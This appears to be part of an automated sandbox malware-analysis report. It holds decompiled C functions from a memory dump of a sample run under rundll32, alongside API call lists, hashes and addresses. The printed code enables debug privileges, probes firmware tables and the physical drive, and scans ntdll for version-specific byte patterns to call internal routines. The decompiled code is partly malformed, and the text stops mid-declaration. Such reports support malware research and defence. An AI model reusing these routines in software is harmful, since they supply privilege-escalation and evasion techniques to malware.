                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002000,?,00000000), ref: 046468F9
                                                            • CloseHandle.KERNEL32(?), ref: 04646908
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Handle$AddressCloseControlCreateDeviceFileModuleProc
                                                            • String ID: GetSystemFirmwareTable$\\.\PhysicalDrive0$kernel32
                                                            • API String ID: 2970610107-3170356133
                                                            • Opcode ID: c4047c7bbdd84de509cd58c539448159f41a7c1fa60b0b55aa887b37984ee12e
                                                            • Instruction ID: d34440171f22425ac9f5e59d83c48b460cb45a5cf080b565c43e049a49f14a17
                                                            • Opcode Fuzzy Hash: c4047c7bbdd84de509cd58c539448159f41a7c1fa60b0b55aa887b37984ee12e
                                                            • Instruction Fuzzy Hash: E8E1E674A002059FCF19CF68D854AEDBBF1FF9A314B18825DD446A7341F736A946CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0464AC90(WCHAR* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                            				void* _v28;
                                                            				signed int _t11;
                                                            				void* _t22;
                                                            				WCHAR* _t32;
                                                            				signed int _t36;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t36;
                                                            				_t32 = __ecx;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                            					_v24.PrivilegeCount = 1;
                                                            					_v12 = 2;
                                                            					LookupPrivilegeValueW(0, _t32,  &(_v24.Privileges));
                                                            					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                            					GetLastError();
                                                            					_t35 =  !=  ? 0 : 1;
                                                            					CloseHandle(_v28);
                                                            					_t22 =  !=  ? 0 : 1;
                                                            					return E04655AFE(_v8 ^ _t36);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t36);
                                                            				}
                                                            			}











                                                            0x0464ac96
                                                            0x0464ac9d
                                                            0x0464aca5
                                                            0x0464acbe
                                                            0x0464acd3
                                                            0x0464acda
                                                            0x0464ace1
                                                            0x0464acf6
                                                            0x0464acfc
                                                            0x0464ad09
                                                            0x0464ad0c
                                                            0x0464ad15
                                                            0x0464ad23
                                                            0x0464acc2
                                                            0x0464accf
                                                            0x0464accf

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04649E8E), ref: 0464ACAF
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,04649E8E), ref: 0464ACB6
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04649E8E), ref: 0464ACE1
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04649E8E), ref: 0464ACF6
                                                            • GetLastError.KERNEL32(?,?,04649E8E), ref: 0464ACFC
                                                            • CloseHandle.KERNEL32(?,?,?,04649E8E), ref: 0464AD0C
                                                            Strings
                                                            • SeIncreaseQuotaPrivilege, xrefs: 0464ACD7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeIncreaseQuotaPrivilege
                                                            • API String ID: 3398352648-3255188008
                                                            • Opcode ID: 084d230b489129cac4dc68a5f3ec679145c15de7b8bf08555800d02aa85c6e7c
                                                            • Instruction ID: 07eb62131cb33655f3a842cb53451f201cd44218fe3ea12b626532143ec4b87f
                                                            • Opcode Fuzzy Hash: 084d230b489129cac4dc68a5f3ec679145c15de7b8bf08555800d02aa85c6e7c
                                                            • Instruction Fuzzy Hash: 1211A575B40209AFDB149FA4EC0DBBE7BB8EF44711F000069F90AE6190EE755D048B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0464AD30(void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                            				void* _v28;
                                                            				signed int _t11;
                                                            				void* _t22;
                                                            				signed int _t33;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t33;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                            					_v24.PrivilegeCount = 1;
                                                            					_v12 = 2;
                                                            					LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &(_v24.Privileges));
                                                            					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                            					GetLastError();
                                                            					_t32 =  !=  ? 0 : 1;
                                                            					CloseHandle(_v28);
                                                            					_t22 =  !=  ? 0 : 1;
                                                            					return E04655AFE(_v8 ^ _t33);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t33);
                                                            				}
                                                            			}










                                                            0x0464ad36
                                                            0x0464ad3d
                                                            0x0464ad5b
                                                            0x0464ad6f
                                                            0x0464ad7a
                                                            0x0464ad81
                                                            0x0464ad96
                                                            0x0464ad9c
                                                            0x0464ada9
                                                            0x0464adac
                                                            0x0464adb5
                                                            0x0464adc2
                                                            0x0464ad5e
                                                            0x0464ad6b
                                                            0x0464ad6b

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,ntdll.dll,76A20320,00000000,?), ref: 0464AD4C
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,ntdll.dll,76A20320,00000000,?), ref: 0464AD53
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0464AD81
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,ntdll.dll,76A20320), ref: 0464AD96
                                                            • GetLastError.KERNEL32(?,?,?,ntdll.dll,76A20320), ref: 0464AD9C
                                                            • CloseHandle.KERNEL32(?,?,?,?,ntdll.dll,76A20320), ref: 0464ADAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 3398352648-2896544425
                                                            • Opcode ID: ae3ce1b3aea2ded4b4cb429fbc0bc10989960e7fcc2efa629251cc5e130fdac7
                                                            • Instruction ID: fee9d7816a63975d05458c0121f7f9747c67978472c160d9b37c8030635eb7d2
                                                            • Opcode Fuzzy Hash: ae3ce1b3aea2ded4b4cb429fbc0bc10989960e7fcc2efa629251cc5e130fdac7
                                                            • Instruction Fuzzy Hash: 3D018471A40209ABDB14AFA4DC4EBBE7BB8EF08711F000059F90AE6191EF755D048B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0463C560(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				char _v14;
                                                            				short _v16;
                                                            				intOrPtr _v20;
                                                            				short _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v296;
                                                            				intOrPtr _v300;
                                                            				intOrPtr _v304;
                                                            				char _v308;
                                                            				intOrPtr _v312;
                                                            				intOrPtr _v316;
                                                            				intOrPtr _v320;
                                                            				intOrPtr _v324;
                                                            				signed int _t101;
                                                            				_Unknown_base(*)()* _t108;
                                                            				void* _t113;
                                                            				intOrPtr _t114;
                                                            				intOrPtr _t115;
                                                            				void* _t139;
                                                            				intOrPtr* _t140;
                                                            				intOrPtr* _t150;
                                                            				intOrPtr* _t153;
                                                            				intOrPtr* _t157;
                                                            				void* _t158;
                                                            				void* _t160;
                                                            				void* _t161;
                                                            				void* _t162;
                                                            				void* _t169;
                                                            				void* _t170;
                                                            				intOrPtr _t175;
                                                            				void* _t176;
                                                            				void* _t182;
                                                            				intOrPtr* _t188;
                                                            				signed int _t189;
                                                            				void* _t191;
                                                            				void* _t197;
                                                            				intOrPtr _t198;
                                                            				void* _t200;
                                                            				void* _t202;
                                                            				void* _t203;
                                                            				void* _t205;
                                                            				void* _t209;
                                                            				void* _t211;
                                                            				void* _t214;
                                                            				void* _t217;
                                                            				struct HINSTANCE__* _t220;
                                                            				void* _t221;
                                                            				void* _t222;
                                                            				void* _t223;
                                                            				void* _t224;
                                                            				void* _t225;
                                                            				void* _t226;
                                                            				signed int _t227;
                                                            
                                                            				_t197 = __edi;
                                                            				_t101 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t101 ^ _t227;
                                                            				_v324 = _a4;
                                                            				_v316 = _a8;
                                                            				_t220 = GetModuleHandleA("ntdll");
                                                            				if(_t220 == 0) {
                                                            					L91:
                                                            					return E04655AFE(_v8 ^ _t227);
                                                            				} else {
                                                            					E0465DEA0(__edi,  &_v308, 0, 0x114);
                                                            					_t108 = GetProcAddress(_t220, "RtlGetVersion");
                                                            					if(_t108 == 0) {
                                                            						goto L91;
                                                            					} else {
                                                            						_push( &_v308);
                                                            						if( *_t108() != 0 || _t220->i != 0x5a4d) {
                                                            							goto L91;
                                                            						} else {
                                                            							_t188 =  *((intOrPtr*)(_t220 + 0x3c)) + _t220;
                                                            							if( *_t188 != 0x4550) {
                                                            								goto L91;
                                                            							} else {
                                                            								_t157 = 0;
                                                            								_t113 = ( *(_t188 + 0x14) & 0x0000ffff) + 0x18 + _t188;
                                                            								_t189 =  *(_t188 + 6) & 0x0000ffff;
                                                            								if(_t189 == 0) {
                                                            									goto L91;
                                                            								} else {
                                                            									while(( *(_t113 + 0x24) & 0x20000000) == 0) {
                                                            										_t157 = _t157 + 1;
                                                            										_t113 = _t113 + 0x28;
                                                            										if(_t157 < _t189) {
                                                            											continue;
                                                            										} else {
                                                            											return E04655AFE(_v8 ^ _t227);
                                                            										}
                                                            										goto L92;
                                                            									}
                                                            									_push(_t197);
                                                            									_t198 =  *((intOrPtr*)(_t113 + 0x10));
                                                            									_v320 = _t198;
                                                            									_t191 =  *((intOrPtr*)(_t113 + 0xc)) + _t220;
                                                            									if(_t191 == 0 || _t198 == 0) {
                                                            										L90:
                                                            										goto L91;
                                                            									} else {
                                                            										_t114 = _v304;
                                                            										if(_t114 != 0xa) {
                                                            											if(_t114 != 6) {
                                                            												goto L90;
                                                            											} else {
                                                            												_t115 = _v300;
                                                            												if(_t115 == 3) {
                                                            													goto L35;
                                                            												} else {
                                                            													if(_t115 != 2) {
                                                            														if(_t115 != 1) {
                                                            															goto L90;
                                                            														} else {
                                                            															_t223 = 0;
                                                            															_v20 = 0x8b55ff8b;
                                                            															_v16 = 0x56ec;
                                                            															_t203 = _t198 + 0xfffffff9;
                                                            															_v14 = 0x68;
                                                            															_v312 = 0x38e05d89;
                                                            															do {
                                                            																_t161 = 0;
                                                            																while( *((intOrPtr*)(_t161 + _t223 + _t191)) ==  *((intOrPtr*)(_t227 + _t161 - 0x10))) {
                                                            																	_t161 = _t161 + 1;
                                                            																	if(_t161 < 7) {
                                                            																		continue;
                                                            																	}
                                                            																	break;
                                                            																}
                                                            																if(_t161 == 7) {
                                                            																	_t153 = _t223 + _t191;
                                                            																	if(_t153 == 0) {
                                                            																		goto L90;
                                                            																	} else {
                                                            																		_t224 = 0;
                                                            																		_t205 = _v320 + 0xfffffffc;
                                                            																		do {
                                                            																			_t162 = 0;
                                                            																			while( *((intOrPtr*)(_t162 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t162 - 0x134))) {
                                                            																				_t162 = _t162 + 1;
                                                            																				if(_t162 < 4) {
                                                            																					continue;
                                                            																				}
                                                            																				break;
                                                            																			}
                                                            																			if(_t162 == 4) {
                                                            																				goto L76;
                                                            																			} else {
                                                            																				goto L74;
                                                            																			}
                                                            																			goto L92;
                                                            																			L74:
                                                            																			_t224 = _t224 + 1;
                                                            																		} while (_t224 <= _t205);
                                                            																		return E04655AFE(_v8 ^ _t227);
                                                            																	}
                                                            																} else {
                                                            																	goto L66;
                                                            																}
                                                            																goto L92;
                                                            																L66:
                                                            																_t223 = _t223 + 1;
                                                            															} while (_t223 <= _t203);
                                                            															return E04655AFE(_v8 ^ _t227);
                                                            														}
                                                            													} else {
                                                            														_t225 = 0;
                                                            														_v20 = 0x8b55ff8b;
                                                            														_v16 = 0x56ec;
                                                            														_t209 = _t198 + 0xfffffff9;
                                                            														_v14 = 0x68;
                                                            														_v312 = 0x38e05d89;
                                                            														do {
                                                            															_t169 = 0;
                                                            															asm("o16 nop [eax+eax]");
                                                            															while( *((intOrPtr*)(_t169 + _t225 + _t191)) ==  *((intOrPtr*)(_t227 + _t169 - 0x10))) {
                                                            																_t169 = _t169 + 1;
                                                            																if(_t169 < 7) {
                                                            																	continue;
                                                            																}
                                                            																break;
                                                            															}
                                                            															if(_t169 == 7) {
                                                            																_t153 = _t225 + _t191;
                                                            																if(_t153 == 0) {
                                                            																	goto L90;
                                                            																} else {
                                                            																	_t224 = 0;
                                                            																	_t211 = _v320 + 0xfffffffc;
                                                            																	do {
                                                            																		_t170 = 0;
                                                            																		asm("o16 nop [eax+eax]");
                                                            																		while( *((intOrPtr*)(_t170 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t170 - 0x134))) {
                                                            																			_t170 = _t170 + 1;
                                                            																			if(_t170 < 4) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		if(_t170 == 4) {
                                                            																			L76:
                                                            																			_t125 =  *((intOrPtr*)(_t224 + _t191 + 0x1b));
                                                            																			if( *((intOrPtr*)(_t224 + _t191 + 0x1b)) == 0) {
                                                            																				goto L90;
                                                            																			} else {
                                                            																				 *_t153(_v324,  *((intOrPtr*)(_v316 + 0x50)));
                                                            																				return E04655AFE(_v8 ^ _t227, _t125);
                                                            																			}
                                                            																		} else {
                                                            																			goto L58;
                                                            																		}
                                                            																		goto L92;
                                                            																		L58:
                                                            																		_t224 = _t224 + 1;
                                                            																	} while (_t224 <= _t211);
                                                            																	return E04655AFE(_v8 ^ _t227);
                                                            																}
                                                            															} else {
                                                            																goto L50;
                                                            															}
                                                            															goto L92;
                                                            															L50:
                                                            															_t225 = _t225 + 1;
                                                            														} while (_t225 <= _t209);
                                                            														return E04655AFE(_v8 ^ _t227);
                                                            													}
                                                            												}
                                                            											}
                                                            										} else {
                                                            											if(_v300 != 0) {
                                                            												goto L90;
                                                            											} else {
                                                            												_t175 = _v296;
                                                            												if(_t175 < 0x3fab) {
                                                            													if(_t175 - 0x3ad7 > 0x4d3) {
                                                            														if(_t175 < 0x3ad7) {
                                                            															L35:
                                                            															_t150 = 0;
                                                            															_v20 = 0x8b575653;
                                                            															_t221 = 0;
                                                            															_v16 = 0x50f98bda;
                                                            															_v32 = 0x89f4458d;
                                                            															_t200 = _t198 + 0xfffffff8;
                                                            															_v28 = 0x8d50f855;
                                                            															_v24 = 0xfc55;
                                                            															do {
                                                            																_t158 = 0;
                                                            																while( *((intOrPtr*)(_t158 + _t221 + _t191)) ==  *((intOrPtr*)(_t227 + _t158 - 0x10))) {
                                                            																	_t158 = _t158 + 1;
                                                            																	if(_t158 < 8) {
                                                            																		continue;
                                                            																	}
                                                            																	break;
                                                            																}
                                                            																if(_t158 == 8) {
                                                            																	_t150 = _t191 - 0xb + _t221;
                                                            																} else {
                                                            																	goto L40;
                                                            																}
                                                            																L79:
                                                            																if(_t150 != 0) {
                                                            																	L89:
                                                            																	 *_t150();
                                                            																} else {
                                                            																	_t222 = 0;
                                                            																	_t202 = _v320 + 0xfffffff6;
                                                            																	do {
                                                            																		_t160 = 0;
                                                            																		while( *((intOrPtr*)(_t160 + _t222 + _t191)) ==  *((intOrPtr*)(_t227 + _t160 - 0x1c))) {
                                                            																			_t160 = _t160 + 1;
                                                            																			if(_t160 < 0xa) {
                                                            																				continue;
                                                            																			}
                                                            																			break;
                                                            																		}
                                                            																		if(_t160 == 0xa) {
                                                            																			_t150 = _t191 - 0xb + _t222;
                                                            																		} else {
                                                            																			goto L85;
                                                            																		}
                                                            																		L88:
                                                            																		if(_t150 != 0) {
                                                            																			goto L89;
                                                            																		}
                                                            																		goto L90;
                                                            																		L85:
                                                            																		_t222 = _t222 + 1;
                                                            																	} while (_t222 <= _t202);
                                                            																	goto L88;
                                                            																}
                                                            																goto L90;
                                                            																L40:
                                                            																_t221 = _t221 + 1;
                                                            															} while (_t221 <= _t200);
                                                            															goto L79;
                                                            														}
                                                            														goto L90;
                                                            													} else {
                                                            														_t226 = 0;
                                                            														_v20 = 0x89f0458d;
                                                            														_v16 = 0x8d50f855;
                                                            														_t214 = _t198 + 0xfffffff6;
                                                            														_v12 = 0xf455;
                                                            														do {
                                                            															_t176 = 0;
                                                            															while( *((intOrPtr*)(_t176 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t176 - 0x10))) {
                                                            																_t176 = _t176 + 1;
                                                            																if(_t176 < 0xa) {
                                                            																	continue;
                                                            																}
                                                            																break;
                                                            															}
                                                            															if(_t176 == 0xa) {
                                                            																_t139 = _t191 - 0xb;
                                                            																goto L32;
                                                            															} else {
                                                            																goto L29;
                                                            															}
                                                            															goto L92;
                                                            															L29:
                                                            															_t226 = _t226 + 1;
                                                            														} while (_t226 <= _t214);
                                                            														return E04655AFE(_v8 ^ _t227);
                                                            													}
                                                            												} else {
                                                            													_t226 = 0;
                                                            													_v20 = 0x8d575653;
                                                            													_v16 = 0xfa8bf845;
                                                            													_t217 = _t198 + 0xfffffff8;
                                                            													do {
                                                            														_t182 = 0;
                                                            														while( *((intOrPtr*)(_t182 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t182 - 0x10))) {
                                                            															_t182 = _t182 + 1;
                                                            															if(_t182 < 8) {
                                                            																continue;
                                                            															}
                                                            															break;
                                                            														}
                                                            														if(_t182 == 8) {
                                                            															_t139 = _t191 - 8;
                                                            															L32:
                                                            															_t140 = _t139 + _t226;
                                                            															if(_t140 == 0) {
                                                            																goto L90;
                                                            															} else {
                                                            																 *_t140();
                                                            																return E04655AFE(_v8 ^ _t227);
                                                            															}
                                                            														} else {
                                                            															goto L20;
                                                            														}
                                                            														goto L92;
                                                            														L20:
                                                            														_t226 = _t226 + 1;
                                                            													} while (_t226 <= _t217);
                                                            													return E04655AFE(_v8 ^ _t227);
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L92:
                                                            			}



























































                                                            0x0463c560
                                                            0x0463c569
                                                            0x0463c570
                                                            0x0463c580
                                                            0x0463c586
                                                            0x0463c592
                                                            0x0463c596
                                                            0x0463c99e
                                                            0x0463c9ad
                                                            0x0463c59c
                                                            0x0463c5aa
                                                            0x0463c5b8
                                                            0x0463c5c0
                                                            0x00000000
                                                            0x0463c5c6
                                                            0x0463c5cc
                                                            0x0463c5d1
                                                            0x00000000
                                                            0x0463c5e5
                                                            0x0463c5e8
                                                            0x0463c5f0
                                                            0x00000000
                                                            0x0463c5f6
                                                            0x0463c5fa
                                                            0x0463c5ff
                                                            0x0463c601
                                                            0x0463c607
                                                            0x00000000
                                                            0x0463c610
                                                            0x0463c610
                                                            0x0463c619
                                                            0x0463c61a
                                                            0x0463c61f
                                                            0x00000000
                                                            0x0463c623
                                                            0x0463c630
                                                            0x0463c630
                                                            0x00000000
                                                            0x0463c61f
                                                            0x0463c636
                                                            0x0463c637
                                                            0x0463c63a
                                                            0x0463c640
                                                            0x0463c642
                                                            0x0463c99d
                                                            0x00000000
                                                            0x0463c650
                                                            0x0463c650
                                                            0x0463c659
                                                            0x0463c7ab
                                                            0x00000000
                                                            0x0463c7b1
                                                            0x0463c7b1
                                                            0x0463c7ba
                                                            0x00000000
                                                            0x0463c7bc
                                                            0x0463c7bf
                                                            0x0463c879
                                                            0x00000000
                                                            0x0463c87f
                                                            0x0463c87f
                                                            0x0463c881
                                                            0x0463c888
                                                            0x0463c88e
                                                            0x0463c891
                                                            0x0463c895
                                                            0x0463c8a0
                                                            0x0463c8a0
                                                            0x0463c8a2
                                                            0x0463c8ae
                                                            0x0463c8b2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c8b2
                                                            0x0463c8b7
                                                            0x0463c8d1
                                                            0x0463c8d6
                                                            0x00000000
                                                            0x0463c8dc
                                                            0x0463c8e2
                                                            0x0463c8e4
                                                            0x0463c8e7
                                                            0x0463c8e7
                                                            0x0463c8f0
                                                            0x0463c8ff
                                                            0x0463c903
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c903
                                                            0x0463c908
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c90a
                                                            0x0463c90a
                                                            0x0463c90b
                                                            0x0463c91f
                                                            0x0463c91f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c8b9
                                                            0x0463c8b9
                                                            0x0463c8ba
                                                            0x0463c8ce
                                                            0x0463c8ce
                                                            0x0463c7c5
                                                            0x0463c7c5
                                                            0x0463c7c7
                                                            0x0463c7ce
                                                            0x0463c7d4
                                                            0x0463c7d7
                                                            0x0463c7db
                                                            0x0463c7e5
                                                            0x0463c7e5
                                                            0x0463c7e7
                                                            0x0463c7f0
                                                            0x0463c7fc
                                                            0x0463c800
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c800
                                                            0x0463c805
                                                            0x0463c81f
                                                            0x0463c824
                                                            0x00000000
                                                            0x0463c82a
                                                            0x0463c830
                                                            0x0463c832
                                                            0x0463c835
                                                            0x0463c835
                                                            0x0463c837
                                                            0x0463c840
                                                            0x0463c84f
                                                            0x0463c853
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c853
                                                            0x0463c858
                                                            0x0463c922
                                                            0x0463c922
                                                            0x0463c928
                                                            0x00000000
                                                            0x0463c92a
                                                            0x0463c93a
                                                            0x0463c94c
                                                            0x0463c94c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c85e
                                                            0x0463c85e
                                                            0x0463c85f
                                                            0x0463c873
                                                            0x0463c873
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c807
                                                            0x0463c807
                                                            0x0463c808
                                                            0x0463c81c
                                                            0x0463c81c
                                                            0x0463c7bf
                                                            0x0463c7ba
                                                            0x0463c65f
                                                            0x0463c666
                                                            0x00000000
                                                            0x0463c66c
                                                            0x0463c66c
                                                            0x0463c678
                                                            0x0463c6d1
                                                            0x0463c752
                                                            0x0463c758
                                                            0x0463c758
                                                            0x0463c75a
                                                            0x0463c761
                                                            0x0463c763
                                                            0x0463c76a
                                                            0x0463c771
                                                            0x0463c774
                                                            0x0463c77b
                                                            0x0463c781
                                                            0x0463c781
                                                            0x0463c783
                                                            0x0463c78f
                                                            0x0463c793
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c793
                                                            0x0463c798
                                                            0x0463c952
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c954
                                                            0x0463c956
                                                            0x0463c98c
                                                            0x0463c99b
                                                            0x0463c958
                                                            0x0463c95e
                                                            0x0463c960
                                                            0x0463c963
                                                            0x0463c963
                                                            0x0463c965
                                                            0x0463c971
                                                            0x0463c975
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c975
                                                            0x0463c97a
                                                            0x0463c986
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c988
                                                            0x0463c98a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c97c
                                                            0x0463c97c
                                                            0x0463c97d
                                                            0x00000000
                                                            0x0463c981
                                                            0x00000000
                                                            0x0463c79e
                                                            0x0463c79e
                                                            0x0463c79f
                                                            0x00000000
                                                            0x0463c7a3
                                                            0x00000000
                                                            0x0463c6d3
                                                            0x0463c6d3
                                                            0x0463c6d5
                                                            0x0463c6dc
                                                            0x0463c6e3
                                                            0x0463c6e6
                                                            0x0463c6f0
                                                            0x0463c6f0
                                                            0x0463c6f2
                                                            0x0463c6fe
                                                            0x0463c702
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c702
                                                            0x0463c707
                                                            0x0463c721
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c709
                                                            0x0463c709
                                                            0x0463c70a
                                                            0x0463c71e
                                                            0x0463c71e
                                                            0x0463c67a
                                                            0x0463c67a
                                                            0x0463c67c
                                                            0x0463c683
                                                            0x0463c68a
                                                            0x0463c690
                                                            0x0463c690
                                                            0x0463c692
                                                            0x0463c69e
                                                            0x0463c6a2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c6a2
                                                            0x0463c6a7
                                                            0x0463c6c1
                                                            0x0463c724
                                                            0x0463c724
                                                            0x0463c726
                                                            0x00000000
                                                            0x0463c72c
                                                            0x0463c737
                                                            0x0463c749
                                                            0x0463c749
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463c6a9
                                                            0x0463c6a9
                                                            0x0463c6aa
                                                            0x0463c6be
                                                            0x0463c6be
                                                            0x0463c678
                                                            0x0463c666
                                                            0x0463c659
                                                            0x0463c642
                                                            0x0463c607
                                                            0x0463c5f0
                                                            0x0463c5d1
                                                            0x0463c5c0
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll,00000000,74CB43E0), ref: 0463C58C
                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0463C5B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: RtlGetVersion$h$ntdll$V
                                                            • API String ID: 1646373207-3705289206
                                                            • Opcode ID: 54c389e704a7102ca63f7fc963a37f5d774b3ca38117b306484705259554f047
                                                            • Instruction ID: be7c33abd227b84f0fb789af9c80164ee60c2a956fb80acdf8b34ccb0b0b8aa5
                                                            • Opcode Fuzzy Hash: 54c389e704a7102ca63f7fc963a37f5d774b3ca38117b306484705259554f047
                                                            • Instruction Fuzzy Hash: 75C13533A001988BCB348F58D4D46BDB7B0FF56315F6511AED9966B291FA31A942CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 23%
                                                            			E04653DA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int* _a20, signed short* _a24) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				intOrPtr* _v32;
                                                            				intOrPtr* _v36;
                                                            				signed short _v50;
                                                            				char _v52;
                                                            				long _v56;
                                                            				signed int* _v60;
                                                            				intOrPtr _v64;
                                                            				void* _v76;
                                                            				intOrPtr* _v116;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v136;
                                                            				signed int _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				long _v160;
                                                            				signed int _v164;
                                                            				intOrPtr _v168;
                                                            				signed int _v184;
                                                            				char _v188;
                                                            				intOrPtr _v192;
                                                            				intOrPtr _v196;
                                                            				signed int _v208;
                                                            				intOrPtr _v212;
                                                            				char _v216;
                                                            				signed int _t124;
                                                            				signed short _t127;
                                                            				void* _t128;
                                                            				signed int _t129;
                                                            				signed int _t130;
                                                            				signed int* _t131;
                                                            				intOrPtr _t132;
                                                            				signed int* _t135;
                                                            				void* _t137;
                                                            				signed int _t139;
                                                            				void* _t141;
                                                            				signed int _t144;
                                                            				intOrPtr _t154;
                                                            				signed int _t156;
                                                            				long _t160;
                                                            				long _t163;
                                                            				signed int _t165;
                                                            				signed int _t174;
                                                            				void* _t175;
                                                            				signed int _t176;
                                                            				long _t177;
                                                            				signed int _t180;
                                                            				signed int _t185;
                                                            				signed int _t187;
                                                            				long _t188;
                                                            				signed short _t191;
